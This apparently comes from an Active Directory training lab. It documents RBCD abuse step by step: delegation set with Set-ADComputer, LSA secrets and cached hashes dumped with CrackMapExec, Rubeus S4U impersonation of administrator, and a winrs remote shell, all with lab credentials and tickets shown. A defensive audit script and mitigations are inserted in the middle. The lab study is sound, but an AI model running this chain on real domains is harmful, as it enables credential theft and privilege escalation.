Learning Objective - 17
To abuse RBCD in the most effective way, we only need two privileges:
Write permissions over the target service or object, so that we can set msDS-AllowedToActOnBehalfOfOtherIdentity.
Control over an object that has an SPN configured (for example admin access to a domain-joined machine, or the ability to join a machine to the domain: ms-DS-MachineAccountQuota is 10 for every domain user by default).
From the previous labs you know that we have access to the ciadmin user, so we enumerate its permissions.
dcorp\ciadmin:*ContinuousIntrusion123
Using RSAT (the ActiveDirectory module) we configure RBCD on dcorp-mgmt, allowing our student machine account to act on behalf of other identities.
PS C:\AD\Tools\ADModule-master\ActiveDirectory> $comps = 'dcorp-std723$'
PS C:\AD\Tools\ADModule-master\ActiveDirectory> Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount $comps
PS C:\AD\Tools\ADModule-master\ActiveDirectory>
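The Set-ADComputer call above is exactly what a defender needs to be able to find again: a computer object whose msDS-AllowedToActOnBehalfOfOtherIdentity now names a principal that should not be there, in a domain where ms-DS-MachineAccountQuota still lets any user bring their own SPN-bearing object. The following audit is an added example written for this page, not code from the lab or course; it assumes the RSAT ActiveDirectory module is loaded and that the caller can read the two attributes. The function names (Get-RbcdConfiguredComputers, Get-MachineAccountQuota) are my own.

```powershell
# Added defender-side audit (not part of the lab): list every computer object that has
# msDS-AllowedToActOnBehalfOfOtherIdentity populated, resolve the principals that may
# delegate to it, and report ms-DS-MachineAccountQuota, the two conditions the RBCD
# abuse relies on. Assumes the RSAT ActiveDirectory module is available.
Import-Module ActiveDirectory

function Get-RbcdConfiguredComputers {
    # Presence filter: only objects where the attribute is set at all are returned,
    # which on a healthy domain is normally a very short list.
    Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
        -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity', PrincipalsAllowedToDelegateToAccount |
    ForEach-Object {
        # The AD module exposes the attribute as a security descriptor; every access
        # ACE identity in it is a principal allowed to perform S4U2proxy against
        # this computer's services (http/dcorp-mgmt in the lab).
        $sd = $_.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        $principals = @()
        if ($sd) {
            $principals = $sd.Access | ForEach-Object {
                try   { $_.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
                catch { $_.IdentityReference.Value }   # keep the raw SID if it no longer resolves
            }
        }
        [PSCustomObject]@{
            Computer              = $_.Name
            AllowedToActOnBehalf  = ($principals -join ', ')
            # Friendly view of the same data as distinguished names, for comparison
            PrincipalDNs          = ($_.PrincipalsAllowedToDelegateToAccount -join ', ')
        }
    }
}

function Get-MachineAccountQuota {
    # Default is 10: any authenticated user may join that many computers, which hands an
    # attacker an SPN-bearing object for free. Setting it to 0 closes that path.
    $domainDn = (Get-ADDomain).DistinguishedName
    (Get-ADObject -Identity $domainDn -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
}

# Usage: run from a host with the AD module; review every row, then clear any entry
# that was not placed by an administrator on purpose.
Get-RbcdConfiguredComputers | Format-Table -AutoSize
"ms-DS-MachineAccountQuota: $(Get-MachineAccountQuota)"
```

An unexpected entry is removed with Set-ADComputer -Identity <computer> -PrincipalsAllowedToDelegateToAccount $null, which is the inverse of the command used in the lab. Two further points close the specific path shown here: with Directory Service Changes auditing enabled (and a SACL on the computer objects), the modification of msDS-AllowedToActOnBehalfOfOtherIdentity is logged as event 5136 on the domain controller, and marking privileged accounts as "sensitive and cannot be delegated" or placing them in the Protected Users group prevents S4U2proxy from issuing a service ticket in their name, so the administrator impersonation that follows would fail even with RBCD configured.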
Now we dump the LSA secrets of our student machine to obtain its AES key (the dcorp-std723$ machine account).
crackmapexec smb 172.16.100.23 -u 'student723' -p 'hT3qDFRHGzVpJtym' --lsa
SMB 172.16.100.23 445 DCORP-STD723 [*] Windows 10.0 Build 20348 x64 (name:DCORP-STD723) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB 172.16.100.23 445 DCORP-STD723 [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB 172.16.100.23 445 DCORP-STD723 [+] Dumping LSA secrets
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/svcadmin:$DCC2$10240#svcadmin#80dcb7982483a2ee1aaa9ef2da703179
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/websvc:$DCC2$10240#websvc#5100e73bf7f60de365fe1e39d21070c9
SMB 172.16.100.23 445 DCORP-STD723 DOLLARCORP.MONEYCORP.LOCAL/appadmin:$DCC2$10240#appadmin#8bb559da7ec65410afbd8c561b37f5b5
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aes256-cts-hmac-sha1-96:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aes128-cts-hmac-sha1-96:df30e9661d9fdbec4812b51673713729
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:des-cbc-md5:bf10e370e064101c
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:plain_password_hex:3c004300200059006e0020007900340038004e0057005900420031006c00440049004e00340043005e00220044003e005b0031003f00270037005f0020003a0051007700440042004a004300500059006c005f002b00600064003e002800720044007700360023007000270066002d006f0037003c0039005200710043005400790071006a007100520078005e0057002f00210040003700440024002a002c003b007600620063003e004f005400610058004700420058006d007100260030002f002f004300770044006d00600029002400290071006d005c0073004d003100580068004b0032006400730036002000
SMB 172.16.100.23 445 DCORP-STD723 dcorp\DCORP-STD723$:aad3b435b51404eeaad3b435b51404ee:b7e5761232035582a44230df3247d401:::
SMB 172.16.100.23 445 DCORP-STD723 dpapi_machinekey:0xababb32297aa7249ddae9c0653a6a1017e71b9a4
dpapi_userkey:0xf06a4a31213cab5931ec2c976ab3de2ec6297136
SMB 172.16.100.23 445 DCORP-STD723 NL$KM:2155a8f764dd9afa80950f03e8e4765e11349956de62e100c6fd7db814af4f7358c168e316e2049893a539c61b7ae419fee6efdc7364728cf92af25c68d2db73
SMB 172.16.100.23 445 DCORP-STD723 [+] Dumped 12 LSA secrets to /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.secrets and /home/dsds/.cme/logs/DCORP-STD723_172.16.100.23_2024-03-03_192256.cached
Then we run Rubeus.
PS C:\AD\Tools> .\Rubeus.exe s4u /user:dcorp-std723$ /aes256:8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595 /msdsspn:http/dcorp-mgmt /impersonateuser:administrator /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: S4U
[*] Using aes256_cts_hmac_sha1 hash: 8af99cbdd43c481488c733f0c0d54263a82d986c4477b7ed3e1a4c331fb2e595
[*] Building AS-REQ (w/ preauth) for: 'dollarcorp.moneycorp.local\dcorp-std723$'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
LmxvY2Fs
[*] Action: S4U
[*] Building S4U2self request for: 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'dcorp-std723$@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):
doIGVzCCBlOgAwIBBaEDAgEWooIFQTCCBT1hggU5MIIFNaADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMohowGKADAgEBoREwDxsNZGNvcnAtc3RkNzIzJKOCBPIwggTuoAMCARKhAwIBAqKCBOAE
ggTcDiZfokRZXbTLQ0fLEDWhAlUDzf03O1ajhZ+rfUueWrQENaGiTBfWw+ahfflX/QKr94QR/djouKeP
vhODBGL5R33bbqjy88wmt1P7p3kzrxeuFy006IE5X2ESWzu8witIC8j0pufBEukR5IP6O5HExsqAyR+J
NVyNpIOJ2n4fVpP/+ugpZ4Hy4VHCr4RtTBlj3Xx4gDo+j6+FLN1Xxs8nwHmgqdrZETIkmMr9FqxuqgR7
2GcUi+4IYIL3ORATYcrE/JH8vN5nVqbkfr5rx0Ec4yZ0fVkwIb14qeDKQgtZQvhDEIPA7r0jZ139/X5U
g4sJd6TihD83u6jJaKKsQ8p1lj5qjHv1VIIMomXqCMaq4Xdp3Qhm4iUfTUCmjrUSpLob/csPt+jhZVn5
dbvGvfu5A5uObsC8U+n12RLXoXS3+aIXAuvK+W4gMXBRxe0Xhk/yd+ijHshWaeoTyTL1XWBYc3fIvtDL
RpsQfw95B/njfhfU3GIRQIkhdJokStSyuHjJ1lwy+uJNEUJMYiqI/UwdyXLVbdl8v83hvG9fZqa0+bvM
EDtWgZkQ6fZokHOSZR99N2ORUr5JspVyNd4n8LKcuFBpAy3Wn6gfkuvdxp4/1MtAcCg4Hg+0C6YKxMSY
q3eGJX9d5KFKlmAaRz1JGbYMGFn/XLuMljw3Tbs/qj0V5WS6MJRUzVg24np3gaSo/Zaz70m3mgmxlKwg
ap+CJdjdwmlNHpo5UcXDQ1brTqYXVh5u198cHTJ3nsdfDqh6R/KUNweeT/4+sMSTPB2ElJVxbhbJ0iRL
d8gRIkl6vTrVTUNpZNt+xJ7ny85hrWV+kBUihUcRUE9UCPoy4YpFkiF6mBDVdbEjqilNsR2fxfxYHyKN
p/79XlwSMAaTiTP0qwlvUQBNWnb7qiMg66fBahUDgNTNiv4ze+lPb5z5CjcSAXfxWo/gCYdUegmrprUL
qLZ0Ep4K8kpGPfW61xKXLKauAA4aOxd5LiL43rJfFsK/TbxAgEKCpWIozctsH7lf3OCOYbjmxcA7JpkC
yQ+ck+5K84m9WCEywCK/+Ls6BcFSCIXFIvq6IOeC9Ut/nUSP/etxMK9sImzCr/XlzrZ+NzrfoHySCbDe
1ieXMv8FGjeGn+mWna21sgVMnuMPnPJUUm+IlQebn4cwyUDUnyYyet91AUBP+yYDK5pNz7/oAfpdzii0
FfYJuIYI6+lXlwlX5flPdpGUzWXQWw+aQNkhI0WVSAts0BLF8UQX6rtVmXgDS/NGVnSQAqkl7fiXgsnF
PtrPsBw7uqNY5ew0fJhFYIRHoGSSD3oLurpUK/v8vmkMtVTyDYu+tjjrr1IdOYFgD3yVGs3YWT18jOtM
tawK9fuK6EtBDsUlPcW9MUKiZm7/qKWd6oG6JaUHwbDP+SGmOFbOZQ8U9GMan/cuT6SWNjo4u+bdZ8e5
eRdthk8SQx36www1qeeS+cQshqQCKoGHH1SfxK/wX71ZnCH7P/3AefMb3tUZ56AF0XRfp2Fw6s1aQIp/
yT+Mnc0KDaUOelpzkvFP/zdkRAIdCo2peUEGPUVeag2ZdHx4g4i9INk+o9xWvCj3YvhkfAXhR96IlzbY
XcPSltaqSDp51sbNIdVVgSojEB5lAUgj4e7iyVaUQ27/w3yjexd6DWIEryIQotKjggEAMIH9oAMCAQCi
gfUEgfJ9ge8wgeyggekwgeYwgeOgKzApoAMCARKhIgQgHf7JuTYsspE7T5GSSRrC/6QbI546r5+nL4sA
uW6vxgWhHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUyiGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJh
dG9yowcDBQBAoQAApREYDzIwMjQwMzA0MDA0MDE1WqYRGA8yMDI0MDMwNDEwNDAxNVqnERgPMjAyNDAz
MTEwMDQwMTVaqBwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqRowGKADAgEBoREwDxsNZGNvcnAt
c3RkNzIzJA==
[*] Impersonating user 'administrator' to target SPN 'http/dcorp-mgmt'
[*] Building S4U2proxy request for service: 'http/dcorp-mgmt'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'http/dcorp-mgmt':
doIHBDCCBwCgAwIBBaEDAgEWooIF/DCCBfhhggX0MIIF8KADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoh0wG6ADAgECoRQwEhsEaHR0cBsKZGNvcnAtbWdtdKOCBaowggWmoAMCARKhAwIBAaKC
BZgEggWUvzMFfAGSEAcM5Hd2pSaGJ5bzAP3/0u9GZZNLYqrM0Z4eVjJynrbxc8rvgFc8fWY+Fy6PsqQJ
vDUEFqoO6x1zi+F9+o4rdoEvRJ3GpiODLzqpgRRbuvTJVS+naj3Y642AHS2ZF5cpSm3PFXdhqZdVZHvE
ZtA/PVUthZxhH2ni570Ba7s5EvaIXWT8vLeFXI0p0Qkcd5rZQkJDHl84BCuMHgv7mkZNozjdUcudzZ7T
CzjF2Aa1dtGbm7CzVYHvJUHl0SW0fDj6pZM5nT7RsjKbuUy13UY7ZME59D22XIkKUwCY+Jwif+AUuP6m
rSzv0w9bGaMqsjtvo+cpZ3T4UK52ZvSvQcJd4+vT2BUW75aeW9MDcqsVdYlJRflu+O3KxSNnvLYeH5U7
QA1GsW0KbBYbbA3rVQX1T22SNK7HjlsXjv8CUW2SjfbNy2Qyrg62HMedc2OMyagLWnHI80o3V/hmxRPF
n28nqyohv/u/SCcouEU842jQPMky0W+O/1LZ1D/nIPfGKF+kw6Hmn824es066bn/M7U9uxYwJr1VbsgW
hVTr1Ofv4092g64TT/i/m2H/rqDmZA1bJKqDRleBVcCbQT1+auR8jc8xMexRv78DpLsIveAH3rYKxwSq
Ki5XY/WrJpKSDBi0AAhQ36nD5j+MOnlKqRzbX+tQ/F8d/TXuQgSv+/R4Tvb4P7IUYsNsFUcX//fpOE0q
StofwYWMXKvbmWLcF8xIUbzhlKML80FVFfWviTAdxKBjeo4vonIHu4/ARNrC8BZHK/l2KlzvRFpd1KhL
XcTcSYOQISRWBcQvmryV+vAOIPVMk9j7KUPwsR0fjSEoC6elDYh61d7qPWoRCrzqSjmVGkIp4vp5SrFm
X0l6BFuF61LTjWOBJPOcYYNmO/dekJcxCjHsPq3AY5uYg4e0jNtSzgWOX/msCfu6o92tB+PRKGCIkt4Z
u4FIvbGlMlEifB4HSDJrYcj/0M9qj9+OZ6EUSbkyzJRxUqoXBWMRuOwCmSU1ADgNybSb/OLiVLsoYnWg
ueEsQx7sa+aLNXLljodsrSzIhL8gWa1MrC/QM/jLPuuwwPdzJ/KTiiHTy8k+zWdKSdmHa3lZdcu8g01R
Mc0WR/1cvNNKDzYyBkQyS7tIvGb64uOO8bydwBm5Pn8ZWoWEAptGWijHQnl63IGm2mOebOJ3mac2Qoxd
gi7SybmtTjbHt/vlW/mg4YrFVJ1r8Gj2mcJL6JokZk3OF/B94Xv2Bgj/TgQqdI7WGnXURWSCu6th8cHB
hdMPJTZMhd+4cRl8WyhBSmH9qiT/86zlgxkF6Rfa6ejccgwRCK40f11wJOqB0Q0ZvTCmj4eS2HbVIGBu
3WjvsF/FcgENSXCLJ1JOk8EPQDLnst60MzoP/eNTVcAUnzeEdCamte+1/2BbcO3BFonX0owc08xjJz+g
y17qNpWkvT95c5Wt1LXsSOr5D0yJ5VGwZxXKx7JbwHwgGgelEjWFR11WH/ni2wN77DK4XK9yCIySHJUa
JO1C9TPIz2Vu+LVREjpKwDZDfABzceaOV4eAKKHrc+wzx3CSFc29Uf18gmW5vqNHcDh6wk7sxw1Mcj1B
/A5Lks7wIwKZbVHzrf6ILiMlPUhCOI1nHKjx3eAL0Qsy7jTJbSrPkwUPaA8t8LgE6XOpQ0jhRGOCJOc6
DMBeS+56PVa6fCcIBMdiRmNiqW3Q4aQJ+krPTXi0vat+YCV7OnyH3v6NuqKuy7kFPCWqMUBqS1lFUhH8
CVHlV5c1r6D3qWwRcCCxYfDK5b9vuQnJRh27INOOdYAduwLxJ+H9j94UHAiRnMQMteOF4DLQ+SgPvYir
BRCKrcIS6P6Da/J/Xfn0v8QGm0eYwxvrwVRXSxjUWDSwwvm3Gb6AKGSiOb+Elurzj1+/AwGdo4HzMIHw
oAMCAQCigegEgeV9geIwgd+ggdwwgdkwgdagGzAZoAMCARGhEgQQ2hbTLg9AUyNNoalpYtGNf6EcGxpE
T0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAECh
AAClERgPMjAyNDAzMDQwMDQwMTVaphEYDzIwMjQwMzA0MTA0MDE1WqcRGA8yMDI0MDMxMTAwNDAxNVqo
HBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypHTAboAMCAQKhFDASGwRodHRwGwpkY29ycC1tZ210
[+] Ticket successfully imported!
PS C:\AD\Tools> klist
Current LogonId is 0:0xe922452
Cached Tickets: (1)
#0> Client: administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: http/dcorp-mgmt @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 3/3/2024 16:40:15 (local)
End Time: 3/4/2024 2:40:15 (local)
Renew Time: 3/10/2024 16:40:15 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
After this, with the ticket loaded, we start a remote cmd session with winrs.
PS C:\AD\Tools> winrs -r:dcorp-mgmt cmd.exe
Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator.dcorp>hostname
hostname
dcorp-mgmt
C:\Users\Administrator.dcorp>whoami
whoami
dcorp\administrator
Exploiting RBCD lets you obtain RCE on a machine whose computer object you only had GenericWrite permissions over.